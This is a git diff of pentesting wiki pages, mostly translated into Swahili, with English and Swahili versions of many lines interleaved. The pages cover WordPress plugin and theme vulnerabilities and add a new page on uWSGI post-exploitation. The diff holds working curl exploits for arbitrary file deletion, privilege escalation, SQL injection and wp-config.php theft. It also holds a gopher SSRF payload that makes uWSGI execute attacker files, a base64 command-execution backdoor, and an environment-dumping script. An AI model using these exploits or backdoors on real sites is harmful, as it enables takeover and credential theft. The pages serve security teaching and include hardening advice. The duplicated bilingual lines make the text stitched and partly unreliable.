- Kwa REST routes zinazofanya vitendo vya privileged, inahitaji ukaguzi wa `current_user_can()` na `permission_callback` kali (USITUMIE `__return_true`).
- Tilie more first-party auth (cookies, application passwords, OAuth) badala ya “impersonation” kupitia headers.
References: ona viungo mwishoni mwa ukurasa huu kwa kesi ya umma na uchambuzi mpana.
References: angalia viungo mwishoni mwa ukurasa huu kwa kesi ya umma na uchambuzi mpana.
### Unauthenticated Arbitrary File Deletion via wp_ajax_nopriv (Litho Theme <= 3.0)
WordPress themes and plugins frequently expose AJAX handlers through the `wp_ajax_` and `wp_ajax_nopriv_` hooks. When the **_nopriv_** variant is used **the callback becomes reachable by unauthenticated visitors**, so any sensitive action must additionally implement:
WordPress themes na plugins mara nyingi huonyesha AJAX handlers kupitia `wp_ajax_` na `wp_ajax_nopriv_` hooks. Wakati toleo la **_nopriv_** linapotumika **callback inafikiwa na wageni wasio na uthibitisho**, hivyo kitendo chochote chenye siri kinapaswa kutekeleza pia:
1. A **capability check** (e.g. `current_user_can()` or at least `is_user_logged_in()`), and
2. A **CSRF nonce** validated with `check_ajax_referer()` / `wp_verify_nonce()`, and
3. **Strict input sanitisation / validation**.
1. Ukaguzi wa **capability** (mfano `current_user_can()` au angalau `is_user_logged_in()`), na
2. CSRF nonce iliyo validated na `check_ajax_referer()` / `wp_verify_nonce()`, na
3. Uwekaji wazi wa usafi / uthibitishaji wa pembejeo.
The Litho multipurpose theme (< 3.1) forgot those 3 controls in the *Remove Font Family* feature and ended up shipping the following code (simplified):
The Litho multipurpose theme (< 3.1) alisahau udhibiti huo wa 3 katika kipengele cha *Remove Font Family* na hatimaye ilisambaza code ifuatayo (imefupishwa):
```php
function litho_remove_font_family_action_data() {
if ( empty( $_POST['fontfamily'] ) ) {
@ -443,29 +443,29 @@ die();
add_action( 'wp_ajax_litho_remove_font_family_action_data', 'litho_remove_font_family_action_data' );
add_action( 'wp_ajax_nopriv_litho_remove_font_family_action_data', 'litho_remove_font_family_action_data' );
```
Masuala yaliyotolewa na kipande hiki cha msimbo:
Masuala yaliyotokana na kipande hiki:
* **Unauthenticated access** hook ya `wp_ajax_nopriv_` imeandikishwa.
* **Unauthenticated access** `wp_ajax_nopriv_` hook imejisajili.
* **No nonce / capability check** mgeni yeyote anaweza kufikia endpoint.
* **No path sanitisation** kamba ya `fontfamily` inayodhibitiwa na mtumiaji inaunganishwa na njia ya filesystem bila kuchujwa, ikiruhusu traversal ya kawaida ya `../../`.
* **No path sanitisation** kamba ya `fontfamily` inayodhibitiwa na mtumiaji imeunganishwa kwenye filesystem path bila kuchujwa, ikiruhusu classic `../../` traversal.
#### Uvamizi
#### Utekelezaji
Mshambuliaji anaweza kufuta faili au saraka yoyote **chini ya saraka ya msingi ya uploads** (kawaida `<wp-root>/wp-content/uploads/`) kwa kutuma ombi moja la HTTP POST:
Mshambuliaji anaweza kufuta faili au saraka yoyote **chini ya uploads base directory** (kawaida `<wp-root>/wp-content/uploads/`) kwa kutuma ombi moja la HTTP POST:
```bash
curl -X POST https://victim.com/wp-admin/admin-ajax.php \
-d 'action=litho_remove_font_family_action_data' \
-d 'fontfamily=../../../../wp-config.php'
```
Kwa sababu `wp-config.php` iko nje ya *uploads*, mfululizo wa `../` mara nne unatosha kwenye installation chaguomsingi. Kufuta `wp-config.php` kunalazimisha WordPress kuingia kwenye *mwongozo wa ufungaji* kwenye ziara inayofuata, na kuwezesha kuchukua udhibiti wa tovuti nzima (mshambuliaji anatoa tu usanidi mpya wa DB na kuunda admin user).
Kwa sababu `wp-config.php` iko nje ya *uploads*, mfululizo wa `../` mara nne unatosha kwenye ufungaji wa chaguo-msingi. Kufuta `wp-config.php` kunalazimisha WordPress kuingia kwenye *musaidizi wa usakinishaji* kwenye ziara inayofuata, kuruhusu kunyongwa kwa tovuti kwa ukamilifu (mshambuliaji anatakiwa tu kutoa usanidi mpya wa DB na kuunda mtumiaji admin).
Malengo mengine yenye athari ni plugin/theme `.php` files (kuharibu security plugins) au sheria za `.htaccess`.
Madhumuni mengine yenye athari ni pamoja na plugin/theme `.php` files (kwa kuvunja security plugins) au sheria za `.htaccess`.
#### Orodha ya ugunduzi
#### Orodha ya kugundua
* Iwapo callback yoyote ya `add_action( 'wp_ajax_nopriv_...')` inaita filesystem helpers (`copy()`, `unlink()`, `$wp_filesystem->delete()`, n.k.).
* Kuunganisha ingizo la mtumiaji lisilosafishwa ndani ya njia za faili (angalia `$_POST`, `$_GET`, `$_REQUEST`).
* Kukosekana kwa `check_ajax_referer()` na `current_user_can()`/`is_user_logged_in()`.
* Kila callback ya `add_action( 'wp_ajax_nopriv_...')` inayokiita filesystem helpers (`copy()`, `unlink()`, `$wp_filesystem->delete()`, n.k.).
* Kuunganisha pembejeo za mtumiaji zisizosafishwa ndani ya paths (tafuta `$_POST`, `$_GET`, `$_REQUEST`).
* Ukosefu wa `check_ajax_referer()` na `current_user_can()`/`is_user_logged_in()`.
#### Kuimarisha
```php
@ -487,16 +487,16 @@ add_action( 'wp_ajax_litho_remove_font_family_action_data', 'secure_remove_font_
// 🔒 NO wp_ajax_nopriv_ registration
```
> [!TIP]
> **Kila wakati** chukulia operesheni yoyote ya kuandika/kufuta kwenye disk kuwa yenye hadhi ya juu na hakikisha tena:
> • Authentication • Authorisation • Nonce • Input sanitisation • Path containment (e.g. via `realpath()` plus `str_starts_with()`).
> **Daima** chukulia operesheni yoyote ya kuandika/kufuta kwenye disk kama yenye ruhusa ya juu na hakikisha mara mbili:
> • Uthibitishaji • Uidhinishaji • Nonce • Usafishaji wa ingizo • Ushikaji wa njia (kwa mfano kupitia `realpath()` pamoja na `str_starts_with()`).
---
### Privilege escalation kupitia urejeshaji wa stale role na missing authorization (ASE "View Admin as Role")
### Kuongezeka kwa ruhusa kupitia urejeshaji wa role zilizo zamani na kukosa uidhinishaji (ASE "View Admin as Role")
Plugins nyingi zinaweka kipengele cha "view as role" au kubadilisha role kwa muda kwa kuhifadhi role(s) asilia katika user meta ili ziweze kurejeshwa baadaye. Ikiwa njia ya urejesho inategemea tu request parameters (mfano, `$_REQUEST['reset-for']`) na orodha inayotunzwa na plugin bila kuangalia capabilities na valid nonce, hili linakuwa vertical privilege escalation.
Plugins nyingi hufanya utekelezaji wa kipengele cha "view as role" au kubadilisha role kwa muda kwa kuhifadhi role za awali kwenye user meta ili ziweze kurejeshwa baadaye. Ikiwa njia ya urejeshaji inategemea tu vigezo vya ombi (kwa mfano, `$_REQUEST['reset-for']`) na orodha inayotunzwa na plugin bila kukagua capabilities na nonce halali, hili linageuka kuwa kuongezeka kwa ruhusa kwa wima.
Mfano wa ulimwengu halisi ulipatikana katika Admin and Site Enhancements (ASE) plugin (≤ 7.6.2.1). Reset branch ilirejesha roles kulingana na `reset-for=<username>` ikiwa jina la mtumiaji lilionekana katika array ya ndani `$options['viewing_admin_as_role_are']`, lakini haikufanya either check ya `current_user_can()` wala verification ya nonce kabla ya kuondoa current roles na kuirudia kuingiza roles zilizohifadhiwa kutoka user meta `_asenha_view_admin_as_original_roles`:
Mfano wa ulimwengu halisi ulipatikana kwenye plugin Admin and Site Enhancements (ASE) (≤ 7.6.2.1). Tawi la reset liliirejesha role kulingana na `reset-for=<username>` ikiwa jina la mtumiaji liligundika kwenye array ya ndani `$options['viewing_admin_as_role_are']`, lakini halikufanya ukaguzi wa `current_user_can()` wala uthibitisho wa nonce kabla ya kuondoa role za sasa na kuziweka tena role zilizohifadhiwa kutoka user meta `_asenha_view_admin_as_original_roles`:
```php
// Simplified vulnerable pattern
if ( isset( $_REQUEST['reset-for'] ) ) {
@ -513,17 +513,17 @@ foreach ( $orig as $r ) { $u->add_role( $r ); }
```
Kwa nini inaweza kutumiwa
- Inaamini `$_REQUEST['reset-for']` na chaguo la plugin bila idhini upande wa seva.
- Ikiwa mtumiaji hapo awali alikuwa na ruhusa za juu zilizohifadhiwa katika `_asenha_view_admin_as_original_roles` na alipopunguzwa, anaweza kuzirejesha kwa kutembelea njia ya kuweka upya.
- Katika baadhi ya utolewaji, mtumiaji yeyote aliyethibitishwa anaweza kusababisha kuweka upya kwa jina la mtumiaji mwingine ambalo bado lipo katika `viewing_admin_as_role_are` (idhinishaji limevunjika).
- Inatumaini `$_REQUEST['reset-for']` na chaguo la plugin bila idhinisho upande wa server.
- Iwapo mtumiaji awali alikuwa na vibali vya juu vilivyohifadhiwa katika `_asenha_view_admin_as_original_roles` na alishushwa hadhi, anaweza kuvirudisha kwa kufikia njia ya reset.
- Katika baadhi ya mifumo, mtumiaji yeyote aliyethibitishwa anaweza kusababisha reset kwa jina la mtumiaji mwingine linaloendelea kuwepo katika `viewing_admin_as_role_are` (idhinishaji lililoharibika).
Masharti ya shambulio
Mahitaji ya shambulio
- Toleo la plugin lenye udhaifu na kipengele kimewezeshwa.
- Akaunti lengwa ina jukumu la juu lisilotumika lililohifadhiwa katika user meta kutokana na matumizi ya awali.
- Kikao chochote kilichothibitishwa; hakuna nonce/capability katika mtiririko wa reset.
- Akaunti lengwa ina role ya juu iliyosalia iliyohifadhiwa katika user meta kutoka matumizi ya awali.
- Kikao chochote kilicho thibitishwa; kutokuwepo kwa nonce/capability kwenye mtiririko wa reset.
Utekelezaji (mfano)
Exploitation (example)
```bash
# While logged in as the downgraded user (or any auth user able to trigger the code path),
# hit any route that executes the role-switcher logic and include the reset parameter.
@ -531,36 +531,36 @@ Utekelezaji (mfano)
curl -s -k -b 'wordpress_logged_in=...' \
'https://victim.example/wp-admin/?reset-for=<your_username>'
```
Kwenye builds zilizo hatarini hili hufuta roles za sasa na kurejesha roles za awali zilizohifadhiwa (mfano, `administrator`), kwa ufanisi ikiongeza mamlaka.
Kwenye builds zilizo hatarini hili huondoa roles za sasa na kuzirudisha roles za asili zilizohifadhiwa (kwa mfano, `administrator`), kwa ufanisi kuongeza ruhusa.
Detection checklist
- Tafuta vipengele vya kubadili roles vinavyohifadhi “original roles” katika user meta (mfano, `_asenha_view_admin_as_original_roles`).
- Angalia vipengele vya kubadilisha role ambavyo vinahifadhi “original roles” katika user meta (mf., `_asenha_view_admin_as_original_roles`).
- Tambua njia za reset/restore ambazo:
- Soma majina ya watumiaji kutoka `$_REQUEST` / `$_GET` / `$_POST`.
- Badilisha roles kupitia `add_role()` / `remove_role()` bila `current_user_can()` na `wp_verify_nonce()` / `check_admin_referer()`.
- Ruhusu kwa kuzingatia array ya chaguo la plugin (mfano, `viewing_admin_as_role_are`) badala ya uwezo wa mhusika.
- Kusoma majina ya watumiaji kutoka `$_REQUEST` / `$_GET` / `$_POST`.
- Kubadilisha roles kupitia `add_role()` / `remove_role()` bila `current_user_can()` na `wp_verify_nonce()` / `check_admin_referer()`.
- Kuidhinishwa kwa msingi wa array ya chaguo la plugin (mf., `viewing_admin_as_role_are`) badala ya uwezo wa mhusika.
Hardening
- Tekeleza ukaguzi wa uwezo kwenye kila tawi linalobadilisha hali (mfano, `current_user_can('manage_options')` au ngumu zaidi).
- Lazimisha nonces kwa mabadiliko yote ya role/idhini na uyathibitishe: `check_admin_referer()` / `wp_verify_nonce()`.
- Usiwamini kamwe majina ya watumiaji yanayotolewa na request; tafuta mtumiaji lengwa upande wa server kulingana na mwendeshaji aliye thibitishwa na sera wazi.
- Futa hali ya “original roles” kwenye masasisho ya wasifu/role ili kuepuka kurejeshwa kwa ruhusa za juu zilizokuwa za zamani:
- Lazimisha ukaguzi wa uwezo kwenye kila tawi linalobadilisha hali (mf., `current_user_can('manage_options')` au kali zaidi).
- Lazimisha nonces kwa mabadiliko yote ya role/permission na uyathibitishe: `check_admin_referer()` / `wp_verify_nonce()`.
- Usiwamini kamwe majina ya watumiaji yanayotolewa kupitia request; tatua mtumiaji lengwa upande wa server kulingana na mhusika aliyethibitishwa na sera wazi.
- Batilisha hali ya “original roles” wakati wa masasisho ya profile/role ili kuepuka urejeshaji wa ruhusa za juu zilizochakaa:
```php
add_action( 'profile_update', function( $user_id ) {
delete_user_meta( $user_id, '_asenha_view_admin_as_original_roles' );
}, 10, 1 );
```
- Fikiria kuhifadhi hali ndogo tu na kutumia tokens zenye muda wa uhalali, zilizo na ulinzi wa capability kwa ajili ya kubadilisha role kwa muda.
- Fikiria kuhifadhi minimal state na kutumia time-limited, capability-guarded tokens kwa temporary role switches.
---
### Kuongezeka kwa mamlaka bila uthibitisho kupitia cookietrusted user switching kwenye public `init` (Service Finder “sf-booking”)
### Unauthenticated privilege escalation via cookietrusted user switching on public init (Service Finder “sf-booking”)
Plugins fulani huunganisha user-switching helpers kwenye public `init` hook na huchota utambulisho kutoka kwa cookie inayodhibitiwa na mteja. Ikiwa code inaita `wp_set_auth_cookie()` bila kuthibitisha authentication, capability na nonce halali, mgeni yeyote asiyethibitishwa anaweza kulazimisha kuingia kama user ID yoyote.
Baadhi ya plugins huunganisha user-switching helpers kwenye public `init` hook na hupata utambulisho kutoka kwa client-controlled cookie. Ikiwa code inapiga simu `wp_set_auth_cookie()` bila kuthibitisha authentication, capability na nonce halali, mgeni yeyote asiye na uthibitisho anaweza kulazimisha login kama user ID yoyote.
Mfano wa kawaida wenye hatari (umerahisishwa kutoka Service Finder Bookings ≤ 6.1):
Typical vulnerable pattern (simplified from Service Finder Bookings ≤ 6.1):
```php
function service_finder_submit_user_form(){
if ( isset($_GET['switch_user']) && is_numeric($_GET['switch_user']) ) {
@ -589,13 +589,13 @@ wp_die('Original user not found.');
wp_die('No original user found to switch back to.');
}
```
Kwa nini inaweza kutumika
Kwa nini inaweza kutumiwa
- Hook ya umma ya `init` inafanya mshughulikiaji kupatikana kwa watumiaji wasiothibitishwa (hakuna `is_user_logged_in()` guard).
- Utambulisho umetokana na cookie inayoweza kubadilishwa na mteja (`original_user_id`).
- Kiito cha moja kwa moja cha `wp_set_auth_cookie($uid)` kinaingia muombaji kama mtumiaji huyo bila ukaguzi wowote wa capability/nonce.
- Hook ya umma ya `init` inafanya handler kupatikana kwa unauthenticated users (hakuna `is_user_logged_in()` guard).
- Utambulisho unatokana na cookie inayoweza kubadilishwa na client (`original_user_id`).
- Mwito wa moja kwa moja wa `wp_set_auth_cookie($uid)` unaingia muombaji kama mtumiaji huyo bila ukaguzi wowote wa capability/nonce checks.
Utekelezaji (bila kuidhinishwa)
Exploitation (unauthenticated)
```http
GET /?switch_back=1 HTTP/1.1
Host: victim.example
@ -605,32 +605,32 @@ Connection: close
```
---
### Mambo ya kuzingatia ya WAF kwa WordPress/plugin CVEs
### Mambo ya WAF kwa WordPress/plugin CVEs
WAF za generic za edge/server zimepangwa kwa mifumo pana (SQLi, XSS, LFI). Mapungufu mengi yenye athari kubwa katika WordPress/plugin ni mende za logic/auth maalum za programu ambazo huonekana kama trafiki isiyo hatari isipokuwa engine itakapoelewa routes za WordPress na semantics za plugin.
WAFs za edge/server zimetengenezwa kwa ajili ya mifumo mpana (SQLi, XSS, LFI). Makosa mengi yenye athari kubwa kwenye WordPress/plugin ni hitilafu za mantiki/uthibitisho ndani ya application ambazo zinaonekana kama trafiki isiyo hatari isipokuwa engine itakayofahamu WordPress routes na plugin semantics.
Offensive notes
Vidokezo vya Ofensi
- Lenga endpoints maalum za plugin kwa payloads safi: `admin-ajax.php?action=...`, `wp-json/<namespace>/<route>`, custom file handlers, shortcodes.
- Fanya kwanza njia zisizo na uthibitisho (AJAX `nopriv`, REST with permissive `permission_callback`, public shortcodes). Default payloads mara nyingi hufanikiwa bila obfuscation.
- Lenga endpoints maalum za plugin na payloads safi: `admin-ajax.php?action=...`, `wp-json/<namespace>/<route>`, custom file handlers, shortcodes.
- Chunguza njia zisizo za uthibitisho kwanza (AJAX `nopriv`, REST with permissive `permission_callback`, public shortcodes). Default payloads mara nyingi zinafanikiwa bila obfuscation.
- Mifano ya kawaida yenye athari kubwa: privilege escalation (broken access control), arbitrary file upload/download, LFI, open redirect.
Defensive notes
Vidokezo vya Ulinzi
- Usitegemee saini za generic za WAF kulinda plugin CVEs. Tekeleza virtual patches maalum kwenye application-layer au sasisha haraka.
- Tumia positive-security checks katika code (capabilities, nonces, strict input validation) badala ya negative regex filters.
- Usitegemee saini za WAF za jumla kulinda plugin CVEs. Tekeleza virtual patches za application-layer zinazolenga udhaifu maalum au sasisha haraka.
- Pendelea positive-security checks ndani ya code (capabilities, nonces, strict input validation) badala ya negative regex filters.
## Ulinzi wa WordPress
### Sasisho za kawaida
### Sasisho za Mara kwa Mara
Hakikisha WordPress, plugins, na themes zimeboreshwa hadi toleo jipya. Pia thibitisha kuwa automated updating imewezeshwa katika wp-config.php:
Hakikisha WordPress, plugins, na themes ziko kwenye toleo la sasa. Pia thibitisha kwamba automated updating imewezeshwa katika wp-config.php:
```bash
define( 'WP_AUTO_UPDATE_CORE', true );
add_filter( 'auto_update_plugin', '__return_true' );
add_filter( 'auto_update_theme', '__return_true' );
```
Pia, **weka tu plugins na themes za WordPress za kuaminika**.
Pia, **weka tu WordPress plugins na themes zinazoweza kuaminika**.
### Plugins za Usalama
@ -638,18 +638,18 @@ Pia, **weka tu plugins na themes za WordPress za kuaminika**.
- [**Sucuri Security**](https://wordpress.org/plugins/sucuri-scanner/)
- [**iThemes Security**](https://wordpress.org/plugins/better-wp-security/)
### **Mapendekezo mengine**
### **Mapendekezo Mengine**
- Ondoa mtumiaji wa chaguo-msingi **admin**
- Ondoa mtumiaji chaguo-msingi **admin**
- Tumia **nywila zenye nguvu** na **2FA**
- Mara kwa mara **kagua** ruhusa za watumiaji
- **Punguza idadi ya jaribio la kuingia** ili kuzuia mashambulizi ya Brute Force
- Badilisha jina la faili **`wp-admin.php`** na ruhusu ufikiaji ndani tu au kutoka kwa anwani za IP maalum.
- Kila mara **kagua** **ruhusa** za watumiaji
- **Punguza idadi ya jaribio za kuingia** ili kuzuia Brute Force attacks
- Badilisha jina la faili **`wp-admin.php`** na ruhusu ufikiaji tu ndani au kutoka anwani za IP maalum.
### SQL Injection bila uthibitisho kupitia uhakiki usio wa kutosha (WP Job Portal <= 2.3.2)
### Unauthenticated SQL Injection kutokana na ukosefu wa uthibitishaji (WP Job Portal <= 2.3.2)
Plugin ya uajiri ya WP Job Portal ilifunua kazi ya **savecategory** ambayo hatimaye inatekeleza msimbo wenye udhaifu ufuatao ndani ya `modules/category/model.php::validateFormData()`:
The WP Job Portal recruitment plugin exposed a **savecategory** task that ultimately executes the following vulnerable code inside `modules/category/model.php::validateFormData()`:
```php
$category = WPJOBPORTALrequest::getVar('parentid');
$inquery = ' ';
@ -659,19 +659,19 @@ $inquery .= " WHERE parentid = $category "; // <-- direct concat ✗
$query = "SELECT max(ordering)+1 AS maxordering FROM "
. wpjobportal::$_db->prefix . "wj_portal_categories " . $inquery; // executed later
```
Masuala yaliyoletwa na kipande hiki:
Issues introduced by this snippet:
1. **Ingizo la mtumiaji lisilosafishwa** `parentid` linatokana moja kwa moja na ombi la HTTP.
2. **Ujunganishaji wa string ndani ya WHERE clause** hakuna matumizi ya `is_numeric()` / `esc_sql()` au prepared statement.
3. **Upatikanaji bila uthibitisho** ingawa kitendo kinatekelezwa kupitia `admin-post.php`, ukaguzi pekee uliopo ni **CSRF nonce** (`wp_verify_nonce()`), ambao mtembeleaji yeyote anaweza kuupata kutoka kwenye ukurasa wa umma unaojumuisha shortcode `[wpjobportal_my_resumes]`.
1. **Ingizo la mtumiaji lisilosafishwa** `parentid` linaingia moja kwa moja kutoka HTTP request.
2. **String concatenation inside the WHERE clause** hakuna `is_numeric()` / `esc_sql()` / prepared statement.
3. **Unauthenticated reachability** ingawa action inatekelezwa kupitia `admin-post.php`, ukaguzi wa pekee uliopo ni **CSRF nonce** (`wp_verify_nonce()`), ambao mtumiaji yeyote anaweza kuupata kutoka ukurasa wa umma unaoingiza shortcode `[wpjobportal_my_resumes]`.
#### Utekelezwaji
#### Utekelezaji
1. Pata nonce mpya:
```bash
curl -s https://victim.com/my-resumes/ | grep -oE 'name="_wpnonce" value="[a-f0-9]+' | cut -d'"' -f4
```
2. Ingiza SQL ya hiari kwa kuutumia vibaya `parentid`:
2. Inject arbitrary SQL by abusing `parentid`:
```bash
curl -X POST https://victim.com/wp-admin/admin-post.php \
-d 'task=savecategory' \
@ -679,18 +679,18 @@ curl -X POST https://victim.com/wp-admin/admin-post.php \
-d 'parentid=0 OR 1=1-- -' \
-d 'cat_title=pwn' -d 'id='
```
Majibu yanafunua matokeo ya query iliyowekwa au yanabadilisha database, kuthibitisha SQLi.
The response discloses the result of the injected query or alters the database, proving SQLi.
### Unauthenticated Arbitrary File Download / Path Traversal (WP Job Portal <= 2.3.2)
### Kupakua Faili Bila Uthibitisho / Path Traversal (WP Job Portal <= 2.3.2)
Kazi nyingine, **downloadcustomfile**, iliwaruhusu wageni kupakua **faili yoyote kwenye diski** kwa kupitia path traversal. Sink iliyo hatarishi iko katika `modules/customfield/model.php::downloadCustomUploadedFile()`:
Another task, **downloadcustomfile**, allowed visitors to download **any file on disk** via path traversal. The vulnerable sink is located in `modules/customfield/model.php::downloadCustomUploadedFile()`:
```php
$file = $path . '/' . $file_name;
...
echo $wp_filesystem->get_contents($file); // raw file output
```
`$file_name` ni attacker-controlled na imeunganishwa **bila kusafishwa**. Tena, kizuizi pekee ni **CSRF nonce** ambayo inaweza kupatikana kwenye ukurasa wa resume.
`$file_name` inadhibitiwa na mshambuliaji na imeunganishwa **bila kusafishwa**. Mara nyingine tena, kizuizi pekee ni **CSRF nonce** ambayo inaweza kupatikana kutoka kwenye ukurasa wa resume.
#### Exploitation
```bash
@ -701,9 +701,9 @@ curl -G https://victim.com/wp-admin/admin-post.php \
--data-urlencode 'entity_id=1' \
--data-urlencode 'file_name=../../../wp-config.php'
```
Seva inajibu na yaliyomo ya `wp-config.php`, leaking DB credentials and auth keys.
Seva inarudisha yaliyomo ya `wp-config.php`, leaking DB credentials and auth keys.
## Marejeleo
## Marejeo
- [Unauthenticated Arbitrary File Deletion Vulnerability in Litho Theme](https://patchstack.com/articles/unauthenticated-arbitrary-file-delete-vulnerability-in-litho-the/)
- [Multiple Critical Vulnerabilities Patched in WP Job Portal Plugin](https://patchstack.com/articles/multiple-critical-vulnerabilities-patched-in-wp-job-portal-plugin/)

169
src/network-services-pentesting/pentesting-web/wsgi.md Normal file
View File

@ -0,0 +1,169 @@
# WSGI Post-Exploitation Tricks
{{#include ../../banners/hacktricks-training.md}}
## Muhtasari wa WSGI
Web Server Gateway Interface (WSGI) ni spesifikesheni inayoelezea jinsi web server inavyowasiliana na web applications, na jinsi web applications zinaweza kuunganishwa pamoja ili kuchakata request moja. uWSGI ni mojawapo ya servers maarufu za WSGI, mara nyingi ikitumika kuhudumia Python web applications.
## uWSGI Magic Variables Exploitation
uWSGI hutoa vigezo maalum vinavyoitwa "magic variables" vinavyoweza kutumika kusanidi mienendo ya server kwa njia ya dynamic. Vigezo hivi vinaweza kuwekwa kupitia HTTP headers na vinaweza kusababisha udhaifu mkubwa wa usalama ikiwa havitathminiwa ipasavyo.
### Key Exploitable Variables
#### `UWSGI_FILE` - Utekelezaji wa faili yoyote
```
uwsgi_param UWSGI_FILE /path/to/python/file.py;
```
Kigezo hiki kinaruhusu kupakia na kutekeleza faili zozote za Python kama maombi ya WSGI. Iwapo mshambulizi anaweza kudhibiti kigezo hiki, anaweza kufanikisha Remote Code Execution (RCE).
#### `UWSGI_SCRIPT` - Kupakia skripti
```
uwsgi_param UWSGI_SCRIPT module.path:callable;
uwsgi_param SCRIPT_NAME /endpoint;
```
Inapakia script iliyobainishwa kama programu mpya. Ikiunganishwa na file upload au write capabilities, hii inaweza kusababisha RCE.
#### `UWSGI_MODULE` and `UWSGI_CALLABLE` - Dynamic Module Loading
```
uwsgi_param UWSGI_MODULE malicious.module;
uwsgi_param UWSGI_CALLABLE evil_function;
uwsgi_param SCRIPT_NAME /backdoor;
```
Vigezo hivi vinaruhusu kupakia modules za Python zozote na kuita functions maalum ndani yao.
#### `UWSGI_SETENV` - Udhibiti wa vigezo vya mazingira
```
uwsgi_param UWSGI_SETENV DJANGO_SETTINGS_MODULE=malicious.settings;
```
Inaweza kutumika kubadilisha environment variables, na hivyo kuathiri application behavior au kupakia malicious configuration.
#### `UWSGI_PYHOME` - Python Environment Manipulation
```
uwsgi_param UWSGI_PYHOME /path/to/malicious/venv;
```
Hubadilisha mazingira ya virtual ya Python, na hivyo inaweza kupakia vifurushi hatarishi au mfasiri tofauti wa Python.
#### `UWSGI_CHDIR` - Directory Traversal
```
uwsgi_param UWSGI_CHDIR /etc/;
```
Inabadilisha saraka ya kazi kabla ya kuchakata maombi, jambo ambalo linaweza kutumika kwa mashambulizi ya path traversal.
## SSRF + Gopher kwa
### Njia ya Mashambulizi
Wakati uWSGI inapatikana kupitia SSRF (Server-Side Request Forgery), wadukuzi wanaweza kuingiliana na socket ya ndani ya uWSGI ili kutumia vigezo maalum (magic variables). Hii ni hatari hasa wakati:
1. Programu ina mianya ya SSRF
2. uWSGI inaendesha kwenye port/socket ya ndani
3. Programu haina kuthibitisha vizuri vigezo maalum (magic variables)
uWSGI inapatikana kutokana na SSRF kwa sababu faili ya config `uwsgi.ini` ina: `socket = 127.0.0.1:5000`, ikifanya ipatikane kutoka kwa web application kupitia SSRF.
### Mfano wa Utekelezaji
#### Hatua 1: Tengeneza Payload Hasidi
Kwanza, weka (inject) code ya Python ndani ya faili inayoweza kufikiwa na seva (kuandika faili ndani ya seva, extension ya faili haina umuhimu):
```python
# Payload injected into a JSON profile file
import os
os.system("/readflag > /app/profiles/result.json")
```
#### Hatua 2: Tengeneza uWSGI Protocol Request
Tumia Gopher protocol kutuma raw uWSGI packets:
```
gopher://127.0.0.1:5000/_%00%D2%00%00%0F%00SERVER_PROTOCOL%08%00HTTP/1.1%0E%00REQUEST_METHOD%03%00GET%09%00PATH_INFO%01%00/%0B%00REQUEST_URI%01%00/%0C%00QUERY_STRING%00%00%0B%00SERVER_NAME%00%00%09%00HTTP_HOST%0E%00127.0.0.1%3A5000%0A%00UWSGI_FILE%1D%00/app/profiles/malicious.json%0B%00SCRIPT_NAME%10%00/malicious.json
```
Payload hii:
- Inaunganisha na uWSGI kwenye port 5000
- Inaweka `UWSGI_FILE` ili kuelekeza kwa faili yenye madhara
- Inalazimisha uWSGI kupakia na kutekeleza msimbo wa Python
### uWSGI Protocol Structure
Protocol ya uWSGI inatumia muundo wa binary ambapo:
- Variables zimeandikwa kwa format inayoweka urefu kabla ya string
- Kila variable ina: `[name_length][name][value_length][value]`
- Paketi huanza na header inayojumuisha jumla ya ukubwa
## Post-Exploitation Techniques
### 1. Persistent Backdoors
#### File-based Backdoor
```python
# backdoor.py
import subprocess
import base64
def application(environ, start_response):
cmd = environ.get('HTTP_X_CMD', '')
if cmd:
result = subprocess.run(base64.b64decode(cmd), shell=True, capture_output=True, text=True)
response = f"STDOUT: {result.stdout}\nSTDERR: {result.stderr}"
else:
response = "Backdoor active"
start_response('200 OK', [('Content-Type', 'text/plain')])
return [response.encode()]
```
Kisha tumia `UWSGI_FILE` ili kupakia backdoor hii:
```
uwsgi_param UWSGI_FILE /tmp/backdoor.py;
uwsgi_param SCRIPT_NAME /admin;
```
#### Udumu Kulingana na Mazingira
```
uwsgi_param UWSGI_SETENV PYTHONPATH=/tmp/malicious:/usr/lib/python3.8/site-packages;
```
### 2. Ufichaji wa Taarifa
#### Environment Variable Dumping
```python
# env_dump.py
import os
import json
def application(environ, start_response):
env_data = {
'os_environ': dict(os.environ),
'wsgi_environ': dict(environ)
}
start_response('200 OK', [('Content-Type', 'application/json')])
return [json.dumps(env_data, indent=2).encode()]
```
#### Ufikiaji wa Mfumo wa Faili
Tumia `UWSGI_CHDIR` pamoja na file serving ili kufikia faili nyeti:
```
uwsgi_param UWSGI_CHDIR /etc/;
uwsgi_param UWSGI_FILE /app/file_server.py;
```
### 3. Privilege Escalation
#### Socket Manipulation
Ikiwa uWSGI inaendesha kwa ruhusa zilizoinuliwa, washambuliaji wanaweza kubadilisha ruhusa za soketi:
```
uwsgi_param UWSGI_CHDIR /tmp;
uwsgi_param UWSGI_SETENV UWSGI_SOCKET_OWNER=www-data;
```
#### Kufunika Mipangilio
```python
# malicious_config.py
import os
# Override uWSGI configuration
os.environ['UWSGI_MASTER'] = '1'
os.environ['UWSGI_PROCESSES'] = '1'
os.environ['UWSGI_CHEAPER'] = '1'
```
## Marejeo
- [uWSGI Magic Variables Documentation](https://uwsgi-docs.readthedocs.io/en/latest/Vars.html)
- [IOI SaveData CTF Writeup](https://bugculture.io/writeups/web/ioi-savedata)
- [uWSGI Security Best Practices](https://uwsgi-docs.readthedocs.io/en/latest/Security.html)
{{#include ../../banners/hacktricks-training.md}}

168
src/pentesting-web/cache-deception/README.md
View File

@ -2,30 +2,30 @@
{{#include ../../banners/hacktricks-training.md}}
## The difference
## Tofauti
> **What is the difference between web cache poisoning and web cache deception?**
> **Nini tofauti kati ya web cache poisoning na web cache deception?**
>
> - In **web cache poisoning**, mshambuliaji husababisha programu kuhifadhi baadhi ya maudhui hatarishi katika cache, na maudhui haya hutolewa kutoka cache kwa watumiaji wengine wa programu.
> - In **web cache deception**, mshambuliaji husababisha programu kuhifadhi maudhui nyeti ya mtumiaji mwingine katika cache, kisha mshambuliaji hurudisha maudhui haya kutoka kwenye cache.
> - Katika **web cache poisoning**, mshambuliaji husababisha application kuweka baadhi ya maudhui hatarishi kwenye cache, na maudhui haya hutolewa kutoka kwenye cache kwa watumiaji wengine wa application.
> - Katika **web cache deception**, mshambuliaji husababisha application kuweka baadhi ya maudhui nyeti ya mtumiaji mwingine kwenye cache, na kisha mshambuliaji anazipata maudhui haya kutoka kwenye cache.
## Cache Poisoning
